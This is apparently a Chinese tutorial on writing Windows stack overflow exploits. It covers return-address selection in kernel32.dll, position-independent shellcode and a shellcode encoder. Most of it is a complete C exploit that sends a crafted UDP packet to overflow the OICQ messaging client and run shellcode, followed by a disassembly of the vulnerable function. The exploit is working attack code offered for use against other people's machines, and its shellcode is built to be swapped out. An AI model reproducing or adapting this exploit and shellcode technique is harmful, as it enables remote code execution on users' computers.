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  • WINDOWS下的溢出程序编写技巧

    看了些WINDOWS下的溢出程序,觉得不够统一、完美,决定做一个相对较统一的编写方法,试着解决了些问题。 1、JMP ESP 的问题。 为了尽量统一,都使用KERNERL32。DLL的代码,因为至少同一系统KERNEL32。DLL模块装载地址变化可能小,别的模块可能随着安装应用软 件的环境不同装载地址不同,还有其模块安装是KERNEL32。DLL在比较前面,后面的模块安装地址要随前面模块的变动而变动,所以还是决定用 KERNEL32。DLL相对比较统一(就是同一系统不同版本)。解决了JMP ESP (FF E4)代码找不到问题,增加使用PUSH ESP (54) 。。。。 RET (C3) 或者 PUSH ESP (54) 。。。。 RET 00XX (C2 XX 00) (RET NUM ,NUM最好不要太大,所以做限制 NUM=00XX) 代码,这可以找到很多了。“。。。”为几条不定语句,但要不影响功能的。 比如找到一处代码就可以使用: PUSH ESP AND AL,08 RET 10 选择原则尽量使用模块前面的可用的,因为不同版本前面的相同可能要大。因为9X与NT系统模块装载地址有很大区别,所以用这方法不可能统一,我看了 WINNT、WIN2000竟然KERNEL32。DLL的装载地址也不一样,真有点。。。。具体哪个程序的溢出可以试着找那程序中的 JMP ESP,但这地址一般都是0X00XXXXXX,所以也有问题。 这是否可以在程序中先识别要攻击系统的系统?下面程序是用宏定义。 2、解决SHELLCODE的编写问题。 原来很多程序的SHELLCODE都是用先编写好后用"\XAA\XBB"的形式写出来,一个是不好修改,还有不好看到底是什么SHELLCODE。所以 想法是SHELLCODE和溢出程序一起编写。这对SHELLCODE编写稍微有点要求,这就是要求SHELLCODE代码是可移动代码,就是整个代码地 址移动照常运行。为了减少不兼容,函数调用地址也用LOADLIBRARY和GETPROCADDRESS得到,这样SHELLCODE就只依靠这两个参 数。其实这两个参数也可以在内存里面找到KERNEL32。DLL模块,再根据函数引出表自己得到地址。那样就只有JMP ESP地址在WINNT、WIN200、WIN9X下没有统一了。程序中已经大致有了SHELLCODE编写的雏形。现在有几个问题: 一,确定SHELLCODE函数代码地址,直接指定得到的是一个JMP SHELLCODE的地址,应该有方法直接得到的。 二,SHELLCODE用C编写编译后往往有_CHKESP的一个调用,这可以改汇编编写或者找到里面的call _CHKESP的代码用NOP填充。 3、SHELLCODE字符往往有要求,决定对SHELLCODE编码,前面加一小段代码对SHELLCODE解码,编码为符合要求的SHELLCODE,这减轻对SHELLCODE编写的要求。不同要求主要改写这一小段编码代码。 /* oicq 199b build 0220 overflow program copy by yuange <yuange@163.net> 2000。04。18 新版本0410有堆溢出,用这程序可以攻击,但不能执行SELLCODE */ #include <windows.h> #include <winsock.h> #include <stdio.h> #define NUKEWIN2000 //#define NUKEWIN9X #ifdef NUKEWIN2000 #define RETEIPADDR eipwin2000 #define LoadLibraryfnaddress 0x77e78023 //0x77E60000+0x00018023 LoadLibrary #define GetProcAddressfnaddress 0x77e7564b //0X77E60000+0x0001564B GetProcAddress #else #ifdef NUKEWIN9X #define RETEIPADDR eipwin9x #define LoadLibraryfnaddress 0xbff77750 //0xbff70000+0x00007750 LoadLibrary #define GetProcAddressfnaddress 0xbff76e28 //0xbff70000+0x00006e28 GetProcAddress #else #define RETEIPADDR eipwinnt #define LoadLibraryfnaddress 0x77EE391A //0x77ED0000+0x0001391A LoadLibrary #define GetProcAddressfnaddress 0x77eE4111 //0x77ED0000+0x00014111 GetProcAddress #endif #endif #define NOPCODE 0x90 #define BUFFSIZE 0x2000 #define OICQPORT 4000 #define OICQOVERADD 7+0x41C #define OVERADD OICQOVERADD #define STR0 0 #define STR1 11 #define STR2 23 #define STR3 33 #define STR4 39 #define STR5 51 void shellcodefnlock(); void shellcodefn(); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); int main(int argc, char **argv) { char *server; char *str="user32.dll""\x0""MessageBoxA""\x0"" secuess""\x0"" OK!""\x0""msvcrtd.dll""\x0""exit""\x0"; char buff1[]="\x02\x01\x07\x00\x78\x11\x22\x33\x33\x33\x33\x33\x1f\x30\x1f\x37\x35\x1f""2000-4-10""\x1f""12:00:00""\x1f"; /* oicq udp head */ //0x77ed0000+0x1ddd4 kernel32.dll // push esp // and al,08 // ret 0c char eipwinnt[] ="\xd4\xdd\xee\x77"; //0x77ed0000+0x0001ddd4 char eipwin2000[] ="\xea\x17\xe8\x77"; //0x77e60000+0x000217ea // kernel32.dll // push esp // and al,08 // ret 0c //0x77e2e32a user32.dll JMP ESP char eip2win2000[] = "\x2a\xe3\xe2\x77"; //0x77df0000+0x0003e32a char eipwin9x[] = "\xd9\x6a\xf7\xbf"; //0xbff70000+0x00006ad9 // Kernel32.dll 4.10.2184 0xbff70000+0x0006ad9 // push esp // and al,0x10; // ret 0x10; char buff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong; unsigned int i,j,k; unsigned char temp; int fd; u_short port,port1; SOCKET d_ip; WSADATA wsaData; int result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc <2) { WSACleanup( ); fprintf(stderr,"\n nuke oicq .\n copy by yuange 2000.4.1. \n wellcome to my homepage http://yuange.yeah.net ."); fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]); exit(1); } else server = argv[1]; d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>2) port = atoi(argv[2]); else port=OICQPORT; if(port==0) port=OICQPORT; fd = socket(AF_INET, SOCK_DGRAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in2.sin_family = AF_INET; if(argc>3) port1=atoi(argv[3]); else port1=OICQPORT; if(port1==0) port1=OICQPORT; s_in2.sin_port = htons(port1); s_in2.sin_addr.s_addr =0; s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; bind(fd,(const struct sockaddr FAR* )&s_in2, sizeof(struct sockaddr_in)); printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); memset(buff,NOPCODE,BUFFSIZE); memcpy(buff,buff1,37); _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; // (int *) i=(int*) *chkespadd; _asm{ mov EDI,dword ptr [chkespadd] mov EDI,[EDI] mov i,EDI } chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; // (int *) k=(int *) *shellcodefnadd; _asm{ mov EDI,dword ptr [shellcodefnadd] mov EDI,[EDI] mov k,EDI } shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,"\x90\x90\x90\x90",4)==0) break; } memcpy(buff+OVERADD+0x20,shellcodefnadd+k+4,80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; // (int *)k=*shellcodefnadd; _asm{ mov EDI,dword ptr [shellcodefnadd] mov EDI,[EDI] mov k,EDI } shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,"\x90\x90\x90\x90",4)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); //j); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); memcpy(shellcodebuff+k,str,0x80); sendpacketlong=k+0x80; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+0x20+k,"\x90\x90\x90\x90",4)==0) break; } for(i=0;i<sendpacketlong;++i){ temp=shellcodebuff[i]; temp&=0xf0; temp=temp/0x10; temp+=0x41; buff[OVERADD+0x20+k]=temp; ++k; temp=shellcodebuff[i]; temp&=0x0f; temp+=0x41; buff[OVERADD+0x20+k]=temp; ++k; } memcpy(buff+OVERADD,RETEIPADDR,4); sendpacketlong=OVERADD+0x20+k+0x10; for(i=0;i<1;++i){ j=rand(); buff1[0x5]=j; buff1[0x6]=j+1; j=sendpacketlong; buff[j-1]=0x03; fprintf(stderr,"\n send packet %d bytes.",j); sendto(fd,buff,j,0,(const struct sockaddr FAR* )&s_in3,sizeof(struct sockaddr_in)); } closesocket(fd); WSACleanup( ); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop jmp next getediadd: pop EDI push EDI pop ESI looplock: lodsw sub AX,0x4141 shl AL,4 xor AL,AH stosb cmp AH,0x10 jb looplock jmp shell next: call getediadd shell: nop nop nop nop } } void shellcodefn() { // const char str[]="user32.dll""\x0""MessageBoxA""\x0""msvcrtd.dll""\x0""exit"; FARPROC procloadlib,procgetadd,procmsg,procexit; char *stradd; HANDLE libhandle; procloadlib = LoadLibraryfnaddress; procgetadd = GetProcAddressfnaddress; _asm { jmp nextcall getstradd: pop stradd } libhandle=procloadlib(stradd+STR0); procmsg=procgetadd(libhandle,stradd+STR1); procmsg(0,stradd+STR3,stradd+STR2,0); // libhandle=procloadlib(stradd+STR6); // opensocketadd=procgetadd(stradd+str7); libhandle=procloadlib(stradd+STR4); procexit =procgetadd(libhandle,stradd+STR5); procexit(0); _asm{ die: jmp die nextcall: call getstradd nop nop nop nop } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ // (int *)k=*(shellbuff+i+1); k=shellbuff+i+1; _asm{ mov EDI,k mov EDI,[EDI] mov k,EDI } calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } /* OICQ有问题代码 :00425D51 837C240800 cmp dword ptr [esp+08], 00000000 :00425D56 740C je 00425D64 :00425D58 8B01 mov eax, dword ptr [ecx] :00425D5A FF742408 push [esp+08] :00425D5E FF90B8000000 call dword ptr [eax+000000B8] * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00425D56(C) | :00425D64 33C0 xor eax, eax :00425D66 C20800 ret 0008 :00425D69 B8E4774900 mov eax, 004977E4 :00425D6E E80D700300 call 0045CD80 :00425D73 81EC10040000 sub esp, 00000410 ;有溢出 yrg 2000.04.18 ;缓冲区大小 :00425D79 53 push ebx :00425D7A 56 push esi :00425D7B 8B7508 mov esi, dword ptr [ebp+08] :00425D7E 8D85E4FBFFFF lea eax, dword ptr [ebp+FFFFFBE4] :00425D84 57 push edi :00425D85 50 push eax :00425D86 FF7628 push [esi+28] :00425D89 8BD9 mov ebx, ecx :00425D8B FF7624 push [esi+24] :00425D8E E8C9000000 call 00425E5C :00425D93 85C0 test eax, eax :00425D95 0F84B0000000 je 00425E4B :00425D9B 8D85E8FBFFFF lea eax, dword ptr [ebp+FFFFFBE8] :00425DA1 8D4DF0 lea ecx, dword ptr [ebp-10] :00425DA4 50 push eax :00425DA5 E8CFF10400 call 00474 F79 :00425DAA 8365FC00 and dword ptr [ebp-04], 00000000 :00425DAE 8BBDE6FBFFFF mov edi, dword ptr [ebp+FFFFFBE6] :00425DB4 56 push esi :00425DB5 8D4D08 lea ecx, dword ptr [ebp+08] :00425DB8 E8BCF10400 call 00474F79 :00425DBD 0FB785E4FBFFFF movzx eax, word ptr [ebp+FFFFFBE4] :00425DC4 8B7620 mov esi, dword ptr [esi+20] :00425DC7 83E878 sub eax, 00000078 :00425DCA C645FC01 mov [ebp-04], 01 :00425DCE 7434 je 00425E04 :00425DD0 48 dec eax :00425DD1 7560 jne 00425E33 :00425DD3 51 push ecx :00425DD4 8D45F0 lea eax, dword ptr [ebp-10] :00425DD7 8BCC mov ecx, esp :00425DD9 8965EC mov dword ptr [ebp-14], esp :00425DDC 50 push eax :00425DDD E89EEE0400 call 00474C80 :00425DE2 57 push edi :00425DE3 56 push esi :00425DE4 51 push ecx :00425DE5 8D4508 lea eax, dword ptr [ebp+08] :00425DE8 8BCC mov ecx, esp :00425DEA 8965E8 mov dword ptr [ebp-18], esp :00425DED 50 push eax :00425DEE C645FC03 mov [ebp-04], 03 :00425DF2 E889EE0400 call 00474C80 :00425DF7 8BCB mov ecx, ebx :00425DF9 C645FC01 mov [ebp-04], 01 :00425DFD E8D4030000 call 004261D6 :00425E02 EB2F jmp 00425E33 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00425DCE(C) | :00425E04 51 push ecx :00425E05 8D45F0 lea eax, dword ptr [ebp-10] :00425E08 8BCC mov ecx, esp :00425E0A 8965E8 mov dword ptr [ebp-18], esp :00425E0D 50 push eax :00425E0E E86DEE0400 call 00474C80 :00425E13 57 push edi :00425E14 56 push esi :00425E15 51 push ecx :00425E16 8D4508 lea eax, dword ptr [ebp+08] :00425E19 8BCC mov ecx, esp :00425E1B 8965EC mov dword ptr [ebp-14], esp :00425E1E 50 push eax :00425E1F C645FC02 mov [ebp-04], 02 :00425E23 E858EE0400 call 00474C80 :00425E28 8BCB mov ecx, ebx :00425E2A C645FC01 mov [ebp-04], 01 :00425E2E E860040000 call 00426293 * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:00425DD1(C), :00425E02(U) | :00425E33 8065FC00 and byte ptr [ebp-04], 00 :00425E37 8D4D08 lea ecx, dword ptr [ebp+08] :00425E3A E8CCF00400 call 00474F0B :00425E3F 834DFCFF or dword ptr [ebp-04], FFFFFFFF :00425E43 8D4DF0 lea ecx, dword ptr [ebp-10] :00425E46 E8C0F00400 call 00474F0B * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00425D95(C) | :00425E4B 8B4DF4 mov ecx, dword ptr [ebp-0C] :00425E4E 5F pop edi :00425E4F 5E pop esi :00425E50 64890D00000000 mov dword ptr fs:[00000000], ecx :00425E57 5B pop ebx :00425E58 C9 leave :00425E59 C20400 ret 0004 */ /* OICQ消息的UDP数据结构,参见ZER9的《OICQ的安全问题 》 struct TOicqPtoP { char Tag1; // 0x02 // 显然是 Oicq 的协议编号 or 版本,固定 char Tag2; // 0x01 // 显然是 Oicq 的协议编号 or 版本,固定 char Tag3; // 0x07 char Tag4; // 0x00 char Tag5; // 0x78 char Tag6; // 这两个字节相当于 unix 上的进程 ID, char Tag7; // 随便赋值就可。 char cOicqNub[]; // 发送方的Oicq 号码。 exp:123456 char cFF; // 0x1f 在所有的Oicq 信息结构中,分割符都是 0x1f char cR; // '0' 固定 char cFF; // char cE[]; // "75" ,这一位相对固定,可能是操作方式。 char cFF; char cDateTime[]; // exp: "2000-4-10",0x1f,"12:00:12",0x1f char OutMsg[]; // 发送的消息内容。 char cEnd; // 0x03 ,所有的 oicq 信息都已 0x03 为标记结束。 }; */ </php>
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